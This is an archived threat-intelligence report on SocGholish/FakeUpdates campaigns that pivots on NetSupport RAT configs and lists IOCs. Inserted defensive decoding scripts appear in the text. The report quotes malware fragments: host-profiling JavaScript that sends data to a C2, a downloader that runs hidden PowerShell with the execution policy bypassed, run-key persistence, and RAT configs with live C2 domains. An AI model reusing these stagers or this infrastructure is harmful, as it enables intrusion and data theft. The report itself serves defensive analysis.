{
	"id": "aaad710b-1265-4f75-b74e-d4577e0095cb",
	"created_at": "2026-05-05T02:46:02.575779Z",
	"updated_at": "2026-05-05T02:46:37.060764Z",
	"deleted_at": null,
	"sha1_hash": "7f3c636dfdfb718e18edd4e1f9bdb824c4149f75",
	"title": "SocGholish Campaigns and Initial Access Kit",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1886145,
	"plain_text": "SocGholish Campaigns and Initial Access Kit\r\nBy: Jason Reaves and Joshua Platt\r\nPublished: 2022-05-25 · Archived: 2026-05-05 02:03:02 UTC\r\nSocGholish, also known as FAKEUPDATES, was first reported in 2017. While the initial analysis and reporting did not gain much attention, over time the actor(s) behind the activity continued to expand and develop their operations. Partnering with Evil Corp, the FAKEUPDATE / SOCGHOLISH framework has become a major corporate initial access vector. The threat actor(s) behind the framework have strong underground connections, demonstrated through their partnership with Evil Corp, which signals a thoroughly vetted cybercriminal operation. Threat actors utilizing the framework represent a significant risk to global corporations and have demonstrated top-tier penetration testing abilities. According to the FBI, typical losses attributed to their activity span 1 to 40 million dollars per event[1].\r\nhttps://medium.com/walmartglobaltech/socgholish-campaigns-and-initial-access-kit-4c4283fea8ee\r\nPage 1 of 16\n\nMost public reporting on SocGholish revolves around the use of fake software updates, delivered either through drive-by downloads or through links in email spam. However, as we will demonstrate in this report, the group also runs specific themed campaigns throughout the year. We will link a previously unattributed campaign to this threat group using both our own private research and third-party public research. 
At the end, we will also demonstrate a way to pivot on the SocGholish NetSupport RAT configs, which can lead to other revelations, including the discovery of a publicly available zip file linking one of our discovered RAT configs to a SocGholish campaign.\r\nIRS Campaigns\r\nWhile researching NetSupport RAT campaigns, we came across a campaign involving fake captchas, compromised websites and a .NET-based loader. The malware appeared to be an XLL loader[7] and appeared to be primarily associated with NetSupport campaigns.\r\nWe were able to find one blog post about these campaigns from Cofense[2], along with an IOC dump from a researcher[9], but the details are lacking and no attribution is given. It did provide us with some extra pivot points thanks to their pictures of the campaigns. One pivot point in particular shows the use of compromised websites: these sites simply have a redirect location to the captcha site appended as a base64-encoded parameter:\r\n# echo \"bD1odHRwczovL2lyc2J1c2luZXNzYXVkaXQubmV0L2NhcHRjaGEucGhw\" | base64 --decode\r\nl=hxxps://irsbusinessaudit[.]net/captcha.php\r\nWe can also pivot on this captcha website because they reuse the same code for the captcha gate. The IP address for the hlmequipment domain at the time was 5.252.178[.]213 based on passive DNS data, which shows similar usage of the XLL loader but also a LNK file. The LNK file is a downloader that ultimately leads to NetSupport RAT as well; its wmic command line begins:\r\nprocess call create \"cmd /c start /min C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -c I\r\nLNK files appear to be leveraged through VHD file spam. 
The associated VHD files were:\r\nfe2502a6432f272e6fcb7406182907cd54a94a958ee449be1528263a8caf0ac0\r\n4ca5c2c0cc2bd56626c3499a88bd5b4ce2bf053c37e50902722220279e2d26d5\r\nba757fa287f859745578b293896e4405b040dad3b393a7128966f15fa28dd7d8\r\nThese files could also have been hosted on compromised websites, as with the order.vhd path listed in the IOCs below. The VHD files contain the LNK files, which in the instance we examined download 'restore.dat'. This file is a script-based loader which then loads a base64-encoded .NET XLL loader. These .NET-based loaders use a simplistic scheme to obfuscate all their important strings: each character is stored as an integer a together with a key k and recovered as (a - k) / k:\r\nprivate static Random random = new Random();\r\nprivate static int dec2(int a, int varXLRDDAE) {\r\n    return (a - varXLRDDAE) / varXLRDDAE;\r\n}\r\npublic static string RandomString(int length) {\r\n    IEnumerable\u003cstring\u003e arg_291_0 = Enumerable.Repeat\u003cstring\u003e(Encoding.ASCII.GetString(new byte[] {\r\n        (byte)IVOTSVZ.dec2(2178, 33),\r\n        (byte)IVOTSVZ.dec2(2211, 33),\r\n        (byte)IVOTSVZ.dec2(2244, 33),\r\n        (byte)IVOTSVZ.dec2(2277, 33),\r\n        (byte)IVOTSVZ.dec2(2310, 33),\r\n        (byte)IVOTSVZ.dec2(2343, 33),\r\n        (byte)IVOTSVZ.dec2(2376, 33),\r\nThe seven values shown decode to 'ABCDEFG', the start of the alphabet string that RandomString draws from. The process remains the same across all the campaigns utilizing the loader that we have analyzed. 
Thanks to the static nature of .NET opcodes, we can automatically parse and decode the encoded data.\r\nDecoded strings:\r\nABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789\r\nasdjvibisi4\r\ntaskhostw.exe\r\nhxxp://149.28.68[.]114/form_irs_check.png\r\nSoftware\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\r\ntaskhost\\\\client32.exe\r\n\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\r\nasdkjiufua\r\nOne of the XLL loaders also had a domain onboard instead of an IP. Along with communicating over HTTPS, this sample talked to irsbusinessaudit[.]net, which was leveraged as part of the aforementioned captcha campaigns leading to NetSupport RAT:\r\nGatewayAddress=irsgetwell.net:443\r\nSecondaryGateway=asaicuuvuvyy33ifbcia33.cn:443\r\nGSK=GM\u003cAAFFI:M?ECKHP=IBLFP;I?OED:G\r\nThe gateway address is specifically associated with SocGholish[8].\r\nFakeUpdate Drive-by Downloads\r\nDrive-by download campaigns normally consist of a website with injected JavaScript code. In this case the injected code ends up going to:\r\nhxxps://design.lawrencetravelco[.]com/report?r=dj1iNjI0OWFiNTViODVhMDIxZmRjZCZjaWQ9MjYy\r\nThe sites are designed around social engineering involving browser updates; the browsers being targeted are the main browsers used in the market: Chrome, Firefox, IE and Opera. 
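Added example (not from the original post): both redirector shapes on this page, the appended IRS captcha redirect (l=hxxps://irsbusinessaudit[.]net/captcha.php, decoded with base64 above) and the /report?r= hop just shown, carry their payload as a base64 r= parameter. The code below decodes that parameter, labels the two shapes, and derives the longest prefix IOC that a given plaintext prefix actually guarantees. The host of the IRS redirector is a placeholder (the post does not show one) and the third URL is a benign control; both are constructed.

```python
import base64
from urllib.parse import parse_qs, urlsplit

# Constructed inputs: the two redirector URLs quoted in the post with defanging
# removed, plus a control. compromised-site.example is a placeholder host.
SAMPLE_URLS = [
    'https://compromised-site.example/index.php?r=bD1odHRwczovL2lyc2J1c2luZXNzYXVkaXQubmV0L2NhcHRjaGEucGhw',
    'https://design.lawrencetravelco.com/report?r=dj1iNjI0OWFiNTViODVhMDIxZmRjZCZjaWQ9MjYy',
    'https://www.example.com/report?r=not-base64-at-all',
]


def decode_r_param(url):
    '''Base64-decode the r= query parameter and split it into key/value pairs.
    Returns None when there is no r= or it does not decode to printable text.'''
    query = parse_qs(urlsplit(url).query)
    if 'r' not in query:
        return None
    raw = query['r'][0].replace(' ', '+')   # parse_qs turns a literal + into a space
    raw += '=' * (-len(raw) % 4)            # the observed values are sent unpadded
    try:
        payload = base64.b64decode(raw, validate=True).decode('ascii')
    except (ValueError, UnicodeDecodeError):
        return None
    if not payload.isprintable():
        return None
    return dict(part.split('=', 1) for part in payload.split('&') if '=' in part)


def classify_redirector(url):
    '''Label the two redirector shapes seen in the post, or None.'''
    params = decode_r_param(url)
    if not params:
        return None
    if params.get('l', '').startswith('http'):
        return 'captcha-redirect'        # IRS campaign: l=<captcha gate URL>
    if 'v' in params and 'cid' in params:
        return 'fakeupdate-report'       # drive-by chain: v=<id>&cid=<n>
    return None


def stable_b64_prefix(plaintext):
    '''Only the base64 characters fully determined by plaintext. Every 3 bytes
    become 4 characters, so a prefix of n bytes fixes exactly n*8//6 characters;
    the next one also depends on the byte that follows.'''
    full = base64.b64encode(plaintext).decode('ascii')
    return full[:len(plaintext) * 8 // 6]


if __name__ == '__main__':
    for u in SAMPLE_URLS:
        print(classify_redirector(u), decode_r_param(u))
    print(stable_b64_prefix(b'l=http'), stable_b64_prefix(b'v='))
```

Matching on the decoded parameter is more robust than the literal prefixes: the IOC dj1 is the first three characters of base64('v=') only when the first byte of the value is a letter, because that third character packs the low four bits of '=' with the top two bits of the next byte; a value beginning with a digit encodes as dj0 instead.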
As an example, one lure poses as a Microsoft Edge update.\r\nThe structure of the downloaded zip file will be \u003cWords\u003e.[a-f0-9]{6}.zip and it unzips to a JavaScript file that begins checking in to a C2 and downloading more scripts that profile the environment.\r\nThe script sends off a few hardcoded values, which are normally a letter and two numbers, and sets the variable url2 as the C2 URL. The response from the C2 is then executed in the same context as this script. The next block of code is called 'init' and is normally used to gather more data about the environment it is being executed in, but it can be seen accessing the 'url2' variable previously set:\r\nupperScope.b_request = request\r\nupperScope.reqUrl = url2\r\nSome WMI queries:\r\nvar colItems = objWMIService.ExecQuery(\"SELECT * FROM Win32_ComputerSystemProduct\", \"WQL\");\r\nvar colItems = objWMIService.ExecQuery(\"SELECT * FROM Win32_OperatingSystem\", \"WQL\");\r\nvar colItems = objWMIService.ExecQuery(\"SELECT * FROM AntiSpywareProduct\", \"WQL\");\r\nvar colItems = objWMIService.ExecQuery(\"SELECT * FROM AntiVirusProduct\", \"WQL\");\r\nvar colItems = objWMIService.ExecQuery(\"SELECT * FROM Win32_Process\", \"WQL\");\r\nvar colItems = objWMIService.ExecQuery(\"SELECT * FROM Win32_Service\", \"WQL\");\r\nThe script ends up gathering a lot of information, which is sent off:\r\nvar userdnsdomain = wsh.ExpandEnvironmentStrings('%userdnsdomain%')\r\nvar username = wsh.ExpandEnvironmentStrings('%username%')\r\nvar computername = wsh.ExpandEnvironmentStrings('%computername%')\r\nvar processor_architecture = 
wsh.ExpandEnvironmentStrings('%processor_architecture%')\r\nvar whoami = executeCmdCommand('whoami /all')\r\nreq.push(['init_result', '1'])\r\nreq.push(['ConsentPromptBehaviorAdmin', ConsentPromptBehaviorAdmin])\r\nreq.push(['PromptOnSecureDesktop', PromptOnSecureDesktop])\r\nreq.push(['osBuildNumber', osBuildNumber])\r\nreq.push(['osCaption', osCaption])\r\nreq.push(['whoami', whoami])\r\nreq.push(['userdnsdomain', userdnsdomain])\r\nreq.push(['username', username])\r\nreq.push(['computername', computername])\r\nreq.push(['processor_architecture', processor_architecture])\r\nreq.push(['asproduct', ASProduct])\r\nreq.push(['processlist', processlist])\r\nreq.push(['servicelist', servicelist])\r\nthis['eval'](prepareRequest(req))\r\nThe payload for this chain has previously been NetSupport RAT, but lately a Cobalt Strike loader that AV companies refer to as \"Blister\" has been delivered, normally placed in a folder within ProgramData along with a renamed rundll32 executable. The folder and file names to use are hardcoded in one of the layers responsible for decoding the Cobalt Strike payload, so that the loader can set itself up again if needed.\r\nThe Cobalt Strike malleable profile in use spawns a new WerFault.exe process for itself; this activity blends in nicely with the loader DLLs, which contain many exports and normally cause multiple legitimate faults during sandbox detonations.\r\nFakeUpdate Malspam\r\nThese campaigns have a similar flow to the drive-by download chain above, except that links to compromised websites are spammed out. Example:\r\nhxxps://payyourintern[.]com/two-p-1-posts-in-the-un-for-young-specialists\r\nVisiting this site leads to running injected JavaScript code:\r\n\u003cscript\u003e;(function(){var 
wq=document[id(\"cmVmZXJyZXI=\")]||'';var nb=new RegExp(id('Oi8vKFteL10rKS8='\r\nwhich then leads to the same chain as above. You might have noticed some static values that keep showing up:\r\ncmVmZXJyZXI=\r\nOi8vKFteL10rKS8=\r\nThese are base64 for 'referrer' and '://([^/]+)/', so the injected script reads document.referrer and extracts its host. Thanks to the service PublicWWW[6] we can use these strings to check for other compromised sites.\r\nSocGholish Infection Package\r\nAll of the NetSupport RAT configs related to this threat group that we have discovered share a static structure in the top portion of their config, which means we can pivot on it to find more.\r\nbcd004db9f44f2414c7094f79afb2d80230611e5b4f97960685157d236186126\r\n[HTTP]\r\nGatewayAddress=mixerspring.cn:443\r\nSecondaryGateway=aasdig8g7b448ugudf.cn:443\r\nGSK=GM;NADEL9C\u003eIAPEF9K=OCHFL:C=IAP\r\n4fffa055d56e48fa0c469a54e2ebd857f23eca73a9928805b6a29a9483dffc21\r\n[HTTP]\r\nGatewayAddress=sjvuvja.com:443\r\nSecondaryGateway=nsncasicuasyca831cs3vvz.cn:443\r\nGSK=FK:O?HDE9C\u003eICGHM=FBKFL;E@NFA:I\r\nThis last config (4fff) is related to a NetSupport RAT package which has an interesting relation to another ZIP file. The file names in that ZIP resemble a SocGholish fake Chrome update campaign and infection, so let's analyze them. 
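Added example (not from the original post): the pivot described above, implemented as a small order-preserving parser for NetSupport client32.ini text plus a layout signature taken from the first section. The three configs are the ones quoted on this page, keyed by the sample hashes the post gives them (the IRS sample is quoted without its section header, so [HTTP] is assumed there). The last entry is a constructed control with a different layout; the file is not from any sample.

```python
# Pivot on the fixed top-of-config layout of the SocGholish NetSupport configs.
SAMPLE_CONFIGS = {
    'bcd004db9f44f2414c7094f79afb2d80230611e5b4f97960685157d236186126': '''
[HTTP]
GatewayAddress=mixerspring.cn:443
SecondaryGateway=aasdig8g7b448ugudf.cn:443
GSK=GM;NADEL9C>IAPEF9K=OCHFL:C=IAP
''',
    '4fffa055d56e48fa0c469a54e2ebd857f23eca73a9928805b6a29a9483dffc21': '''
[HTTP]
GatewayAddress=sjvuvja.com:443
SecondaryGateway=nsncasicuasyca831cs3vvz.cn:443
GSK=FK:O?HDE9C>ICGHM=FBKFL;E@NFA:I
''',
    'irs-campaign-xll-sample': '''
[HTTP]
GatewayAddress=irsgetwell.net:443
SecondaryGateway=asaicuuvuvyy33ifbcia33.cn:443
GSK=GM<AAFFI:M?ECKHP=IBLFP;I?OED:G
''',
    'hypothetical-control': '''
[Client]
Quiet=1
[HTTP]
GatewayAddress=192.0.2.10:443
GSK=ABCDEFGHIJKLMNOP
''',
}

# The layout the post describes: [HTTP] comes first and carries exactly these keys.
SOCGHOLISH_LAYOUT = ('HTTP', ('GatewayAddress', 'SecondaryGateway', 'GSK'))


def parse_ini(text):
    '''Minimal order-preserving INI parser. configparser is avoided because it
    lower-cases keys and tries to interpolate % sequences inside values.'''
    sections = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith(';'):
            continue
        if line.startswith('[') and line.endswith(']'):
            sections.append((line[1:-1], []))
        elif '=' in line and sections:
            key, value = line.split('=', 1)   # GSK values contain '=' themselves
            sections[-1][1].append((key.strip(), value.strip()))
    return sections


def layout_signature(sections):
    '''The pivot key: name of the first section plus its keys in order.'''
    if not sections:
        return None
    name, items = sections[0]
    return (name, tuple(key for key, _ in items))


def gateway_iocs(sections):
    '''host:port values a hunter would feed into passive DNS or a blocklist.'''
    return [value for name, items in sections if name == 'HTTP'
            for key, value in items if key in ('GatewayAddress', 'SecondaryGateway')]


def pivot(configs, layout=SOCGHOLISH_LAYOUT):
    '''Return (samples sharing the layout, sorted gateways) so new configs can be triaged.'''
    hits, iocs = [], set()
    for sample, text in configs.items():
        sections = parse_ini(text)
        if layout_signature(sections) == layout:
            hits.append(sample)
            iocs.update(gateway_iocs(sections))
    return hits, sorted(iocs)


if __name__ == '__main__':
    matched, gateways = pivot(SAMPLE_CONFIGS)
    print(matched)
    print(gateways)
```

The signature deliberately ignores the values: gateways rotate between campaigns while the key order does not, which is what makes it usable as a retro-hunt filter over a config corpus.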
First is the fakeupdate file, which would be downloaded to the target's computer in a zip file.\r\nFileName: Chrome.Update.50e772.js\r\nHash: 56de90d87bb9afc5345991b910a17cf0c6ee95cb97ea4b6de87fd93a8f22c9c0\r\n{'URLS': ['https://10b33845.xen.hill-family.us/pixel.gif'], 'C2': ['10b33845.xen.hill-family.us']}\r\nFileName: stage_2.js\r\nHash: ee526c0f6ce5632e585b38322c2b6332730dfa9702d0d94c99dff7a36f98db1b\r\nThis file is the 'init' portion of SocGholish; it acts as an initial profiler for the infected system and sends off quite a lot of data along with some hardcoded values:\r\nvar req = [];\r\nreq.push('b');\r\nreq.push('503');\r\nreq.push(selfName);\r\nreq.push(ComputerName);\r\nreq.push(UserName);\r\nreq.push(Domain);\r\nreq.push(dnsDomain);\r\nreq.push(Manufacturer);\r\nreq.push(Model);\r\nreq.push(BIOS_Version);\r\nreq.push(AntiSpywareProduct);\r\nreq.push(AntiVirusProduct);\r\nreq.push(MACAddress);\r\nreq.push(ProcessList);\r\nthis['eval'](request(req));\r\nFileName: stage_3.js\r\nHash: 465ab5550bc788a274e38a71ecdc246d407c453a7a2d533a9b4aa2d9e53a8463\r\nThis is a downloader designed to download and execute a PowerShell script. The first thing it does is set up some variables that will be leveraged (GetSpecialFolder(2) is the user's temporary folder):\r\nvar execFileName = '2b5fdce5.ps1';\r\nvar fs = new ActiveXObject(\"Scripting.FileSystemObject\");\r\nvar _tempFilePathExec = fs.GetSpecialFolder(2) + \"\\\\\" + execFileName;\r\nIt then submits a request to download the file and writes it to the hardcoded name:\r\ntry {\r\n    var req = [];\r\n    req.push('d');\r\n    req.push('503');\r\n    var fileContent = request(req);\r\n    var stream = new 
ActiveXObject('ADODB.Stream');\r\n    stream.Type = 2;\r\n    stream.Charset = \"ISO-8859-1\";\r\n    stream.Open();\r\n    stream.WriteText(fileContent);\r\n    stream.SaveToFile(_tempFilePathExec, 1);\r\n    stream.Close();\r\n} catch (e) {\r\n    initExeption = 'error number:' + e.number + ' message:' + e.message;\r\n}\r\nIt detonates the script with the PowerShell execution policy bypassed and the window hidden:\r\nif (initExeption == '0') {\r\n    try {\r\n        var wsh = new ActiveXObject(\"WScript.Shell\");\r\n        runFileResult = wsh.Run('powershell -ep bypass -windowstyle hidden -f \"' + _tempFilePathExec + '\"\r\n    } catch (e) {\r\n        runFileExeption += 'error number:' + e.number + ' message:' + e.message;\r\n    }\r\n}\r\nIt then submits the completion status and gets the next stage, which will be another script piece for the JavaScript backdoor portion:\r\nvar req = [];\r\nreq.push('c');\r\nreq.push('503');\r\nreq.push(_tempFilePathExec);\r\nreq.push(runFileResult);\r\nreq.push(initExeption);\r\nreq.push(runFileExeption);\r\nthis['eval'](request(req));\r\nFileName: stage_4.ps1\r\nHash: a1f710e70688c61f447d575a081f10f21c999170e67cdedff11acb6b87b0ba14\r\nThis is the PowerShell file downloaded and detonated by the previous stage; what is interesting is an overlap in obfuscation usage. 
The obfuscation wrapper here is related to ServHelper[4,5], which is utilized by TA505[4]. Decoding is exactly the same as for a ServHelper-related PowerShell file: the 3DES key is derived from a hardcoded password and salt with a reimplementation of .NET's PasswordDeriveBytes (SHA-1, two iterations, 16-byte key) and the base64 blob is decrypted in CBC mode:\r\n\u003e\u003e\u003e passw = 'n1db20gsmk536cazhrtuyx4fvol9q8pi'\r\n\u003e\u003e\u003e salt = 'qxijovsr5w0a7zml9tpn2g3f8u6d1k4y'\r\n\u003e\u003e\u003e blob = find_blob(data)\r\n\u003e\u003e\u003e len(blob)\r\n5289900\r\n\u003e\u003e\u003e derbytes = MS_PasswordDeriveBytes(passw, salt, hashlib.sha1, iterations=2, keylen=16)\r\n\u003e\u003e\u003e c = DES3.new(derbytes, DES3.MODE_CBC, iv[:8])\r\n\u003e\u003e\u003e out = c.decrypt(b64decode(blob))\r\n\u003e\u003e\u003e out[:100]\r\n'\\r\\n\\r\\n\\r\\nfunction oghygb4 {\\r\\n param($string, $method)\\r\\n $saguhga = [System.Text.Encoding]::as\r\n\u003e\u003e\u003e open(sys.argv[1]+'.decr', 'wb').write(out)\r\nThe decoded file is then the stage_5 file from the original ZIP package. 
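Added example (not from the original post): a self-contained stand-in for the MS_PasswordDeriveBytes helper used in the decoding session above, written to mirror .NET's legacy PasswordDeriveBytes.GetBytes(). The first digest-sized block is plain PBKDF1; any further block hashes the ASCII decimal counter (1, 2, ...) prepended to the base value, which is why a generic PBKDF1 or PBKDF2 routine returns a wrong key once more than one digest of output is requested. The password and salt are the ones the post shows for this sample; the IV is assumed to be supplied by the caller from the script (the post does not show where it comes from), and the 3DES step needs pycryptodome.

```python
import base64
import hashlib

# Password and salt as quoted in the post's decoding session.
POST_PASSWORD = b'n1db20gsmk536cazhrtuyx4fvol9q8pi'
POST_SALT = b'qxijovsr5w0a7zml9tpn2g3f8u6d1k4y'


def sha1(data):
    return hashlib.sha1(data).digest()


def ms_password_derive_bytes(password, salt, iterations=2, keylen=16, hashfunc=sha1):
    '''Re-implementation of System.Security.Cryptography.PasswordDeriveBytes.GetBytes
    (assumes iterations >= 2, which is all this sample needs).'''
    base = hashfunc(password + salt)
    for _ in range(iterations - 2):          # base = H^(iterations-1)(password || salt)
        base = hashfunc(base)
    out = hashfunc(base)                     # block 0 = H^iterations(...), i.e. PBKDF1
    counter = 1
    while len(out) < keylen:                 # extra blocks: H(str(counter) || base)
        out += hashfunc(str(counter).encode('ascii') + base)
        counter += 1
    return out[:keylen]


def decrypt_servhelper_blob(blob_b64, iv, password=POST_PASSWORD, salt=POST_SALT):
    '''3DES-CBC decrypt of the base64 blob as in the post's session. The 16-byte key
    selects two-key 3DES. pycryptodome is imported lazily so the KDF above runs
    without it; iv is the caller-supplied IV taken from the script (assumption).'''
    from Crypto.Cipher import DES3
    key = ms_password_derive_bytes(password, salt, iterations=2, keylen=16)
    cipher = DES3.new(key, DES3.MODE_CBC, iv[:8])
    return cipher.decrypt(base64.b64decode(blob_b64))


if __name__ == '__main__':
    print(ms_password_derive_bytes(POST_PASSWORD, POST_SALT).hex())
```

For the 16-byte key in this sample the quirk never triggers, so a PBKDF1 routine would also work; it matters the moment a variant asks for a 24-byte three-key 3DES key, where bytes 20..23 come from SHA-1('1' || base) rather than from another hash iteration.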
This file is responsible for XOR decoding the NetSupport RAT package and also for setting up its installation.\r\nCreates a random folder name in AppData:\r\n$randf=( -join ((0x30..0x39) + ( 0x41..0x5A) + ( 0x61..0x7A) | Get-Random -Count 8 | % {[char]$_}) )$\r\nSets the RAT client name and removes all ps1 files in temp for cleanup:\r\n$clientname='ctfmon'+'.exe'\r\nremove-item $env:TEMP\\*.ps1\r\nWrites the zip file to AppData:\r\n$lit=\"$fpath\\$randf\"+\".zip\"\r\n$gr = [System.Convert]::FromBase64String($nfuyrgg1)\r\nSet-Content -Path \"$lit\r\nUnzips it and then cleans up the zip file:\r\ncd $fpath\r\nexpand-archive \"$lit\" \"./\"\r\nremove-item \"$lit\"\r\nRenames the RAT client to ctfmon.exe:\r\nrename-item \"client32.exe\" \"$clientname\"\r\nDecodes the registry key path used for persistence:\r\n$reg = oghygb4 \"Jik2MF07PQ0TERAGHAcpKA4EHA0GCgETMjUcCwMIGREpJhIVHAcbETECHBEcCgk7PBcb\" \"z47gha\"\r\nSets a run key and starts the process:\r\nnew-ItemProperty -Path \"$reg\" -Name \"ctfmon_\" -Value \"$fpath\\$clientname\"\r\nstart-process \"$fpath\\$clien\r\nFileName: DOo0gd4h.zip\r\nHash: 82ddf784507fffbbbcca749a687990345041c6c6cb5f4d768ee4136b3b4f4f03\r\nThis is the XOR-decoded NetSupport RAT package; the client config:\r\n[HTTP]\r\nGatewayAddress=sjvuvja.com:443\r\nSecondaryGateway=nsncasicuasyca831cs3vvz.cn:443\r\nGSK=FK:O?HDE9C\u003eICGHM=FBKFL;E@NFA:I\r\nIOCs\r\nXLL loaders:\r\n9d8d289dd7fe149e89152983e40b2c1031e0dba3de9d89513163068bfb27a314\r\nccc0204486cbf8b6db43711ddf8d847cfc15d5f713c60b53c461c4e4eeeb1a4f\r\nabf625d2b1f5f0eb5149fa32ab6e81d148c7316ccb03da2b3db29c964a0cffe7\r\n8b7ece2a8678eef68c30332c283abcac6518732bf75eb19418516c18b361fafd\r\n617c331b65e0d26e1e64a04f06555891e719b578fd2bdc41065458176821f0c1\r\nNetSupport RAT 
Packages:\r\n61707f944c47121ba23f3889773aa7c858aa2aae174a145f0170ad7d0384d3bd\r\na79b86d06a64f3df1d503a5052a912de767eb1081b6b5192a1acfb9ce2c0a26e\r\n82ddf784507fffbbbcca749a687990345041c6c6cb5f4d768ee4136b3b4f4f03\r\nCampaign Files:\r\nfac07b49491d3639c0e8c800a71432b4ad1e4d827e9436b49fbbaefeadd853f9\r\nfe2502a6432f272e6fcb7406182907cd54a94a958ee449be1528263a8caf0ac0\r\n4ca5c2c0cc2bd56626c3499a88bd5b4ce2bf053c37e50902722220279e2d26d5\r\nba757fa287f859745578b293896e4405b040dad3b393a7128966f15fa28dd7d8\r\n584de2da31e64ccb44b618173344c5625288ba478d8b74cddd0b12ec7b689be4\r\nNetwork IOCs:\r\nirsbusinessaudit.net\r\nirsbusinessaudit.net/captcha.php\r\nsjvuvja.com\r\nhill-family.us\r\nmixerspring.cn\r\nnsncasicuasyca831cs3vvz.cn\r\naasdig8g7b448ugudf.cn\r\nirsgetwell.net\r\nasaicuuvuvyy33ifbcia33.cn\r\n149.28.68.114/form_irs_check.png\r\n45.77.87.77/form_irs_check.png\r\n5.252.178.213/restore.dat\r\n5.252.178.213/thumb_cdn.png\r\nhlmequipment.com\r\nbusinessaudit.tax/verification.php\r\nirsbusinessaudit.tax/f4742.php?e=info@tulsadiamond.com\r\nirsbusinessaudit.tax/f4742.php?e=tgentry@comfortmc.com\r\ncontentcdns.net\r\nasaasdivu73774vbaa33.cn\r\nsolenica.com/wp-content/themes/twentyfive/order.vhd\r\n45.76.172.113/fakeurl.htm\r\n194.180.158.173/fakeurl.htm\r\n87.120.8.141/fakeurl.htm\r\ndesign.lawrencetravelco.com\r\nRedirectors:\r\n.php?r=bD1odHR\r\n/report?r=dj1\r\nReferences\r\n1: https://docs.house.gov/meetings/JU/JU00/20220329/114533/HHRG-117-JU00-20220329-SD006.pdf\r\n2: https://cofense.com/blog/rat-campaign-looks-to-take-advantage-of-the-tax-season\r\n3: https://research.nccgroup.com/2020/06/23/wastedlocker-a-new-ransomware-variant-developed-by-the-evil-corp-group/\r\n4: https://www.proofpoint.com/us/threat-insight/post/servhelper-and-flawedgrace-new-malware-introduced-ta505\r\n5: 
https://medium.com/walmartglobaltech/ta505-adds-golang-crypter-for-delivering-miners-and-servhelper-af70b26a6e56\r\n6: https://publicwww.com/\r\n7: https://www.bleepingcomputer.com/news/security/malicious-excel-xll-add-ins-push-redline-password-stealing-malware/\r\n8: https://decoded.avast.io/janrubin/parrot-tds-takes-over-web-servers-and-threatens-millions/\r\n9: https://github.com/executemalware/Malware-IOCs/blob/main/2022-02-17%20Netsupport%20IOCs\r\nSource: https://medium.com/walmartglobaltech/socgholish-campaigns-and-initial-access-kit-4c4283fea8ee",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://medium.com/walmartglobaltech/socgholish-campaigns-and-initial-access-kit-4c4283fea8ee"
	],
	"report_names": [
		"socgholish-campaigns-and-initial-access-kit-4c4283fea8ee"
	],
	"threat_actors": [],
	"ts_created_at": 1777949162,
	"ts_updated_at": 1777949197,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/7f3c636dfdfb718e18edd4e1f9bdb824c4149f75.pdf",
		"text": "https://archive.orkl.eu/7f3c636dfdfb718e18edd4e1f9bdb824c4149f75.txt",
		"img": "https://archive.orkl.eu/7f3c636dfdfb718e18edd4e1f9bdb824c4149f75.jpg"
	}
}